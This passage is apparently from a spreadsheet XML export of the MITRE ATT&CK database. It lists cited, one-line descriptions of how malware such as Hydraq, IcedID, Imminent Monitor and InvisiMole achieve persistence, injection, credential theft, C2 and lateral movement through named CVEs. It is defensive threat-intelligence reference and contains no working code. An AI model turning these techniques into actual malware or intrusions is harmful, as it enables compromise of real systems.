    <t>[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to determine if the current user is an administrator, Windows product name, processor name, screen resolution, and physical RAM of the infected host.(Citation: US-CERT HOTCROISSANT February 2020)</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to identify the IP address of the compromised machine.(Citation: US-CERT HOTCROISSANT February 2020)</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to collect the username on the infected host.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to retrieve a list of services on the infected host.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[HotCroissant](https://attack.mitre.org/software/S0431) can remotely open applications on the infected host with the &lt;code&gt;ShellExecuteA&lt;/code&gt; command.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) creates a backdoor through which remote attackers can adjust token privileges.(Citation: Symantec Hydraq Jan 2010)</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) creates a backdoor through which remote attackers can clear all system event logs.(Citation: Symantec Trojan.Hydraq Jan 2010)(Citation: Symantec Hydraq Jan 2010)</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) creates a backdoor through which remote attackers can read data from files.(Citation: Symantec Trojan.Hydraq Jan 2010)(Citation: Symantec Hydraq Jan 2010)</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) connects to a predefined domain on port 443 to exfil gathered information.(Citation: Symantec Hydraq Jan 2010)</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) creates a backdoor through which remote attackers can delete files.(Citation: Symantec Trojan.Hydraq Jan 2010)(Citation: Symantec Hydraq Jan 2010)</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) creates a backdoor through which remote attackers can check for the existence of files, including its own components, as well as retrieve a list of logical drives.(Citation: Symantec Trojan.Hydraq Jan 2010)(Citation: Symantec Hydraq Jan 2010)</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) creates a backdoor through which remote attackers can download files and additional malware components.(Citation: Symantec Trojan.Hydraq Jan 2010)(Citation: Symantec Hydraq Jan 2010)</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) creates a Registry subkey to register its created service, and can also uninstall itself later by deleting this value. [Hydraq](https://attack.mitre.org/software/S0203)'s backdoor also enables remote attackers to modify and delete subkeys.(Citation: Symantec Trojan.Hydraq Jan 2010)(Citation: Symantec Hydraq Jan 2010)</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) uses basic obfuscation in the form of spaghetti code.(Citation: Symantec Elderwood Sept 2012)(Citation: Symantec Trojan.Hydraq Jan 2010)</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) creates a backdoor through which remote attackers can monitor processes.(Citation: Symantec Trojan.Hydraq Jan 2010)(Citation: Symantec Hydraq Jan 2010)</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) creates a backdoor through which remote attackers can retrieve system information, such as CPU speed, from Registry keys.(Citation: Symantec Trojan.Hydraq Jan 2010)(Citation: Symantec Hydraq Jan 2010)</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) includes a component based on the code of VNC that can stream a live feed of the desktop of an infected host.(Citation: Symantec Hydraq Jan 2010)</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) uses svchost.exe to execute a malicious DLL included in a new service group.(Citation: Symantec Hydraq Persistence Jan 2010)</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) creates a backdoor through which remote attackers can load and call DLL functions.(Citation: Symantec Trojan.Hydraq Jan 2010)(Citation: Symantec Hydraq Jan 2010)</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) C2 traffic is encrypted using bitwise NOT and XOR operations.(Citation: Symantec Hydraq Jan 2010)</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) creates a backdoor through which remote attackers can retrieve information such as computer name, OS version, processor speed, memory size, and CPU speed.(Citation: Symantec Hydraq Jan 2010)</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) creates a backdoor through which remote attackers can retrieve IP addresses of compromised machines.(Citation: Symantec Trojan.Hydraq Jan 2010)(Citation: Symantec Hydraq Jan 2010)</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) creates a backdoor through which remote attackers can monitor services.(Citation: Symantec Trojan.Hydraq Jan 2010)(Citation: Symantec Hydraq Jan 2010)</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) creates new services to establish persistence.(Citation: Symantec Trojan.Hydraq Jan 2010)(Citation: Symantec Hydraq Jan 2010)(Citation: Symantec Hydraq Persistence Jan 2010)</t>
  </si>
  <si>
    <t>[HyperBro](https://attack.mitre.org/software/S0398) has used a legitimate application to sideload a DLL to decrypt, decompress, and run a payload.(Citation: Unit42 Emissary Panda May 2019)</t>
  </si>
  <si>
    <t>[HyperBro](https://attack.mitre.org/software/S0398) has the ability to delete a specified file.(Citation: Unit42 Emissary Panda May 2019)</t>
  </si>
  <si>
    <t>[HyperBro](https://attack.mitre.org/software/S0398) has the ability to download additional files.(Citation: Unit42 Emissary Panda May 2019)</t>
  </si>
  <si>
    <t>[HyperBro](https://attack.mitre.org/software/S0398) has the ability to run an application (&lt;code&gt;CreateProcessW&lt;/code&gt;) or script/file (&lt;code&gt;ShellExecuteW&lt;/code&gt;) via API.(Citation: Unit42 Emissary Panda May 2019)</t>
  </si>
  <si>
    <t>[HyperBro](https://attack.mitre.org/software/S0398) can run shellcode it injects into a newly created process.(Citation: Unit42 Emissary Panda May 2019)</t>
  </si>
  <si>
    <t>[HyperBro](https://attack.mitre.org/software/S0398) has the ability to take screenshots.(Citation: Unit42 Emissary Panda May 2019)</t>
  </si>
  <si>
    <t>[HyperBro](https://attack.mitre.org/software/S0398) has the ability to start and stop a specified service.(Citation: Unit42 Emissary Panda May 2019)</t>
  </si>
  <si>
    <t>[HyperBro](https://attack.mitre.org/software/S0398) can list all services and their configurations.(Citation: Unit42 Emissary Panda May 2019)</t>
  </si>
  <si>
    <t>[HyperBro](https://attack.mitre.org/software/S0398) has used HTTPS for C2 communications.(Citation: Unit42 Emissary Panda May 2019)</t>
  </si>
  <si>
    <t>Default Accounts</t>
  </si>
  <si>
    <t>[HyperStack](https://attack.mitre.org/software/S0537) can use default credentials to connect to IPC$ shares on remote machines.(Citation: Accenture HyperStack October 2020)</t>
  </si>
  <si>
    <t>[HyperStack](https://attack.mitre.org/software/S0537) can connect to the IPC$ share on remote machines.(Citation: Accenture HyperStack October 2020)</t>
  </si>
  <si>
    <t>[HyperStack](https://attack.mitre.org/software/S0537) can enumerate all account names on a remote share.(Citation: Accenture HyperStack October 2020)</t>
  </si>
  <si>
    <t>[HyperStack](https://attack.mitre.org/software/S0537) can add the name of its communication pipe to &lt;code&gt;HKLM\SYSTEM\\CurrentControlSet\\Services\\lanmanserver\\parameters\NullSessionPipes&lt;/code&gt;.(Citation: Accenture HyperStack October 2020)</t>
  </si>
  <si>
    <t>[HyperStack](https://attack.mitre.org/software/S0537) can use Windows API's &lt;code&gt;ConnectNamedPipe&lt;/code&gt; and &lt;code&gt;WNetAddConnection2&lt;/code&gt; to detect incoming connections and connect to remote shares.(Citation: Accenture HyperStack October 2020)</t>
  </si>
  <si>
    <t>[HyperStack](https://attack.mitre.org/software/S0537) has used RSA encryption for C2 communications.(Citation: Accenture HyperStack October 2020)</t>
  </si>
  <si>
    <t>[ISMInjector](https://attack.mitre.org/software/S0189) uses the &lt;code&gt;certutil&lt;/code&gt; command to decode a payload file.(Citation: OilRig New Delivery Oct 2017)</t>
  </si>
  <si>
    <t>[ISMInjector](https://attack.mitre.org/software/S0189) is obfuscated with the off-the-shelf SmartAssembly .NET obfuscator created by red-gate.com.(Citation: OilRig New Delivery Oct 2017)</t>
  </si>
  <si>
    <t>[ISMInjector](https://attack.mitre.org/software/S0189) hollows out a newly created process RegASM.exe and injects its payload into the hollowed process.(Citation: OilRig New Delivery Oct 2017)</t>
  </si>
  <si>
    <t>[ISMInjector](https://attack.mitre.org/software/S0189) creates scheduled tasks to establish persistence.(Citation: OilRig New Delivery Oct 2017)</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) has used SSL and TLS in communications with C2.(Citation: IBM IcedID November 2017)(Citation: Juniper IcedID June 2020)</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) has used &lt;code&gt;ZwQueueApcThread&lt;/code&gt; to inject itself into remote processes.(Citation: IBM IcedID November 2017)</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) can query LDAP to identify additional users on the network to infect.(Citation: IBM IcedID November 2017)</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) has the ability to download additional modules and a configuration file from C2.(Citation: IBM IcedID November 2017)(Citation: Juniper IcedID June 2020)</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) has been executed through Word documents with malicious embedded macros.(Citation: Juniper IcedID June 2020)</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) has used web injection attacks to redirect victims to spoofed sites designed to harvest banking and other credentials.  [IcedID](https://attack.mitre.org/software/S0483) can use a self signed TLS certificate in connection with the spoofed site and simultaneously maintains a live connection with the legitimate site to display the correct URL and certificates in the browser.(Citation: IBM IcedID November 2017)(Citation: Juniper IcedID June 2020)</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) can inject itself into a suspended msiexec.exe process to send beacons to C2 while appearing as a normal msi application. (Citation: Juniper IcedID June 2020)</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) has called &lt;code&gt;ZwWriteVirtualMemory&lt;/code&gt;, &lt;code&gt;ZwProtectVirtualMemory&lt;/code&gt;, &lt;code&gt;ZwQueueApcThread&lt;/code&gt;, and &lt;code&gt;NtResumeThread&lt;/code&gt; to inject itself into a remote process.(Citation: Juniper IcedID June 2020)</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) has utilzed encrypted binaries and base64 encoded strings.(Citation: Juniper IcedID June 2020)</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) has the ability to identify Workgroup membership.(Citation: IBM IcedID November 2017)</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) has established persistence by creating a Registry run key.(Citation: IBM IcedID November 2017)</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) has created a scheduled task that executes every hour to establish persistence.(Citation: Juniper IcedID June 2020)</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) has packed and encrypted its loader module.(Citation: Juniper IcedID June 2020)</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) has been delivered via phishing e-mails with malicious attachments.(Citation: Juniper IcedID June 2020)</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) has embedded binaries within RC4 encrypted .png files.(Citation: Juniper IcedID June 2020)</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) has the ability to identify the computer name and OS version on a compromised host.(Citation: IBM IcedID November 2017)</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) has used obfuscated VBA string expressions.(Citation: Juniper IcedID June 2020)</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) has used HTTPS in communications with C2.(Citation: Juniper IcedID June 2020)</t>
  </si>
  <si>
    <t>[IcedID](https://attack.mitre.org/software/S0483) has used WMI to execute binaries.(Citation: Juniper IcedID June 2020)</t>
  </si>
  <si>
    <t>[Imminent Monitor](https://attack.mitre.org/software/S0434) has a remote microphone monitoring capability.(Citation: Imminent Unit42 Dec2019)(Citation: QiAnXin APT-C-36 Feb2019)</t>
  </si>
  <si>
    <t>[Imminent Monitor](https://attack.mitre.org/software/S0434) has a CommandPromptPacket and ScriptPacket module(s) for creating a remote shell and executing scripts.(Citation: QiAnXin APT-C-36 Feb2019)</t>
  </si>
  <si>
    <t>[Imminent Monitor](https://attack.mitre.org/software/S0434) has a PasswordRecoveryPacket module for recovering browser passwords.(Citation: QiAnXin APT-C-36 Feb2019)</t>
  </si>
  <si>
    <t>[Imminent Monitor](https://attack.mitre.org/software/S0434) has decoded malware components that are then dropped to the system.(Citation: QiAnXin APT-C-36 Feb2019)</t>
  </si>
  <si>
    <t>[Imminent Monitor](https://attack.mitre.org/software/S0434) has a feature to disable Windows Task Manager.(Citation: Imminent Unit42 Dec2019)</t>
  </si>
  <si>
    <t>[Imminent Monitor](https://attack.mitre.org/software/S0434) has uploaded a file containing debugger logs, network information and system information to the C2.(Citation: QiAnXin APT-C-36 Feb2019)</t>
  </si>
  <si>
    <t>[Imminent Monitor](https://attack.mitre.org/software/S0434) has deleted files related to its dynamic debugger feature.(Citation: QiAnXin APT-C-36 Feb2019)</t>
  </si>
  <si>
    <t>[Imminent Monitor](https://attack.mitre.org/software/S0434) has a dynamic debugging feature to check whether it is located in the %TEMP% directory, otherwise it copies itself there.(Citation: QiAnXin APT-C-36 Feb2019)</t>
  </si>
  <si>
    <t>[Imminent Monitor](https://attack.mitre.org/software/S0434) has a dynamic debugging feature to set the file attribute to hidden.(Citation: QiAnXin APT-C-36 Feb2019)</t>
  </si>
  <si>
    <t>[Imminent Monitor](https://attack.mitre.org/software/S0434) has a keylogging module.(Citation: Imminent Unit42 Dec2019)</t>
  </si>
  <si>
    <t>[Imminent Monitor](https://attack.mitre.org/software/S0434) has leveraged CreateProcessW() call to execute the debugger.(Citation: QiAnXin APT-C-36 Feb2019)</t>
  </si>
  <si>
    <t>[Imminent Monitor](https://attack.mitre.org/software/S0434) has encrypted the spearphish attachments to avoid detection from email gateways; the debugger also encrypts information before sending to the C2.(Citation: QiAnXin APT-C-36 Feb2019)</t>
  </si>
  <si>
    <t>[Imminent Monitor](https://attack.mitre.org/software/S0434) has a "Process Watcher" feature to monitor processes in case the client ever crashes or gets closed.(Citation: Imminent Unit42 Dec2019)</t>
  </si>
  <si>
    <t>[Imminent Monitor](https://attack.mitre.org/software/S0434) has a module for performing remote desktop access.(Citation: QiAnXin APT-C-36 Feb2019)</t>
  </si>
  <si>
    <t>[Imminent Monitor](https://attack.mitre.org/software/S0434) has the capability to run a cryptocurrency miner on the victim machine.(Citation: Imminent Unit42 Dec2019)</t>
  </si>
  <si>
    <t>[Imminent Monitor](https://attack.mitre.org/software/S0434) has a remote webcam monitoring capability.(Citation: Imminent Unit42 Dec2019)(Citation: QiAnXin APT-C-36 Feb2019)</t>
  </si>
  <si>
    <t>[Impacket](https://attack.mitre.org/software/S0357) modules like GetUserSPNs can be used to get Service Principal Names (SPNs) for user accounts. The output is formatted to be compatible with cracking tools like John the Ripper and Hashcat.(Citation: Impacket Tools)</t>
  </si>
  <si>
    <t>[Impacket](https://attack.mitre.org/software/S0357) modules like ntlmrelayx and smbrelayx can be used in conjunction with [Network Sniffing](https://attack.mitre.org/techniques/T1040) and [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001) to gather NetNTLM credentials for [Brute Force](https://attack.mitre.org/techniques/T1110) or relay attacks that can gain code execution.(Citation: Impacket Tools)</t>
  </si>
  <si>
    <t>SecretsDump and [Mimikatz](https://attack.mitre.org/software/S0002) modules within [Impacket](https://attack.mitre.org/software/S0357) can perform credential dumping to obtain account and password information.(Citation: Impacket Tools)</t>
  </si>
  <si>
    <t>SecretsDump and [Mimikatz](https://attack.mitre.org/software/S0002) modules within [Impacket](https://attack.mitre.org/software/S0357) can perform credential dumping to obtain account and password information from NTDS.dit.(Citation: Impacket Tools)</t>
  </si>
  <si>
    <t>[Impacket](https://attack.mitre.org/software/S0357) can be used to sniff network traffic via an interface or raw socket.(Citation: Impacket Tools)</t>
  </si>
  <si>
    <t>[Impacket](https://attack.mitre.org/software/S0357) contains various modules emulating other service execution tools such as [PsExec](https://attack.mitre.org/software/S0029).(Citation: Impacket Tools)</t>
  </si>
  <si>
    <t>[Impacket](https://attack.mitre.org/software/S0357)'s wmiexec module can be used to execute commands through WMI.(Citation: Impacket Tools)</t>
  </si>
  <si>
    <t>[InnaputRAT](https://attack.mitre.org/software/S0259) has a command to delete files.(Citation: ASERT InnaputRAT April 2018)</t>
  </si>
  <si>
    <t>[InnaputRAT](https://attack.mitre.org/software/S0259) enumerates directories and obtains file attributes on a system.(Citation: ASERT InnaputRAT April 2018)</t>
  </si>
  <si>
    <t>[InnaputRAT](https://attack.mitre.org/software/S0259) variants have attempted to appear legitimate by adding a new service named OfficeUpdateService.(Citation: ASERT InnaputRAT April 2018)</t>
  </si>
  <si>
    <t>[InnaputRAT](https://attack.mitre.org/software/S0259) variants have attempted to appear legitimate by using the file names SafeApp.exe and NeutralApp.exe.(Citation: ASERT InnaputRAT April 2018)</t>
  </si>
  <si>
    <t>[InnaputRAT](https://attack.mitre.org/software/S0259) uses the API call ShellExecuteW for execution.(Citation: ASERT InnaputRAT April 2018)</t>
  </si>
  <si>
    <t>[InnaputRAT](https://attack.mitre.org/software/S0259) uses an 8-byte XOR key to obfuscate API names and other strings contained in the payload.(Citation: ASERT InnaputRAT April 2018)</t>
  </si>
  <si>
    <t>Some [InnaputRAT](https://attack.mitre.org/software/S0259) variants establish persistence by modifying the Registry key &lt;code&gt;HKU\&lt;SID&gt;\Software\Microsoft\Windows\CurrentVersion\Run:%appdata%\NeutralApp\NeutralApp.exe&lt;/code&gt;.(Citation: ASERT InnaputRAT April 2018)</t>
  </si>
  <si>
    <t>[InnaputRAT](https://attack.mitre.org/software/S0259) gathers volume drive information and system information.(Citation: ASERT InnaputRAT April 2018)</t>
  </si>
  <si>
    <t>[InnaputRAT](https://attack.mitre.org/software/S0259) launches a shell to execute commands on the victim’s machine.(Citation: ASERT InnaputRAT April 2018)</t>
  </si>
  <si>
    <t>Some [InnaputRAT](https://attack.mitre.org/software/S0259) variants create a new Windows service to establish persistence.(Citation: ASERT InnaputRAT April 2018)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can enumerate windows and child windows on a compromised host.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) uses a variation of the XOR cipher to encrypt files before exfiltration.(Citation: ESET InvisiMole June 2018)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can use zlib to compress and decompress data.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) uses WinRAR to compress data that is intended to be exfiltrated.(Citation: ESET InvisiMole June 2018)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can inject its code into a trusted process via the APC queue.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can record sound using input audio devices.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can sort and collect specific documents as well as generate a list of all files on a newly inserted drive and store them in an encrypted file.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can use fileless UAC bypass and create an elevated COM object to escalate privileges.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>Component Object Model</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can use the &lt;code&gt;ITaskService&lt;/code&gt;, &lt;code&gt;ITaskDefinition&lt;/code&gt; and &lt;code&gt;ITaskSettings&lt;/code&gt; COM interfaces to schedule a task.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>Control Panel</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can register itself for execution and persistence via the Control Panel.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can be launched by using DLL search order hijacking in which the wrapper DLL is placed in the same folder as explorer.exe and loaded during startup into the Windows Explorer process instead of the legitimate library.(Citation: ESET InvisiMole June 2018)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) has used a custom implementation of DNS tunneling to embed C2 communications in DNS requests and replies.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can collect data from the system, and can monitor changes in specified directories.(Citation: ESET InvisiMole June 2018)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can collect jpeg files from connected MTP devices.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can decrypt, unpack and load a DLL from its resources, or from blobs encrypted with Data Protection API, two-key triple DES, and variations of the XOR cipher.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) has a command to disable routing and the Firewall on the victim’s machine.(Citation: ESET InvisiMole June 2018)</t>
  </si>
  <si>
    <t>Environmental Keying</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can use Data Protection API to encrypt its components on the victim’s computer, to evade detection, and to make sure the payload can only be decrypted and loaded on one specific compromised computer.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) has installed legitimate but vulnerable Total Video Player software and wdigest.dll library drivers on compromised hosts to exploit stack overflow and input validation vulnerabilities for code execution.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) has exploited CVE-2007-5633 vulnerability in the speedfan.sys driver to obtain kernel mode privileges.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can spread within a network via the BlueKeep (CVE-2019-0708) and EternalBlue (CVE-2017-0144) vulnerabilities in RDP and SMB respectively.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>External Proxy</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) InvisiMole can identify proxy servers used by the victim and use them for C2 communication.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) has been configured with several servers available for alternate C2 communications.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) has deleted files and directories including XML and files successfully uploaded to C2 servers.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can list information about files in a directory and recently opened or used documents. [InvisiMole](https://attack.mitre.org/software/S0260) can also search for specific files by supplied file mask.(Citation: ESET InvisiMole June 2018)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can create hidden system directories.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) has executed legitimate tools in hidden windows.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) has undergone regular technical improvements in an attempt to evade detection.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can upload files to the victim's machine for operations.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can can remove all system restore points.(Citation: ESET InvisiMole June 2018)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can function as a proxy to create a server that relays communication between the client and C&amp;C server, or between two clients.(Citation: ESET InvisiMole June 2018)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can use a JavaScript file as part of its execution chain.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can capture keystrokes on a compromised host.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) has a command to list account information on the victim’s machine.(Citation: ESET InvisiMole June 2018)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) determines a working directory where it stores all the gathered data about the compromised machine.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can deliver trojanized versions of software and documents, relying on user execution.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) has attempted to disguise itself by registering under a seemingly legitimate service name.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) has disguised its droppers as legitimate software or documents, matching their original names and locations, and saved its files as mpr.dll in the Windows folder.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) has a command to create, set, copy, or delete a specified Registry key or value.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can use winapiexec tool for indirect execution of  &lt;code&gt;ShellExecuteW&lt;/code&gt; and &lt;code&gt;CreateProcessA&lt;/code&gt;.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can scan the network for open ports and vulnerable instances of RDP and SMB protocols.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>Network Share Connection Removal</t>
  </si>
  <si>
    <t xml:space="preserve">
[InvisiMole](https://attack.mitre.org/software/S0260) can disconnect previously connected remote drives.(Citation: ESET InvisiMole June 2018)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can gather network share information.(Citation: ESET InvisiMole June 2018)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) has used TCP to download additional modules.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can use a modified base32 encoding to encode data within the subdomain of C2 requests.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) avoids analysis by encrypting all strings, internal files, configuration data and by using a custom executable format.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can inject its backdoor as a portable executable into a target process.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can obtain a list of running processes.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can inject itself into another process to avoid detection including use of a technique called ListPlanting that customizes the sorting algorithm in a ListView structure.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can mimic HTTP protocol with custom HTTP “verbs” HIDE, ZVVP, and NOP.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can enumerate Registry values, keys, and data.(Citation: ESET InvisiMole June 2018)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can place a lnk file in the Startup Folder to achieve persistence.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) has used rundll32.exe for execution.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) has used scheduled tasks named &lt;code&gt;MSST&lt;/code&gt; and &lt;code&gt;\Microsoft\Windows\Autochk\Scheduled&lt;/code&gt; to establish persistence.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can capture screenshots of not only the entire screen, but of each separate window open, in case they are overlapping.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can check for the presence of network sniffers, AV, and BitDefender firewall.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) has used Windows services as a way to execute its malicious payload.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
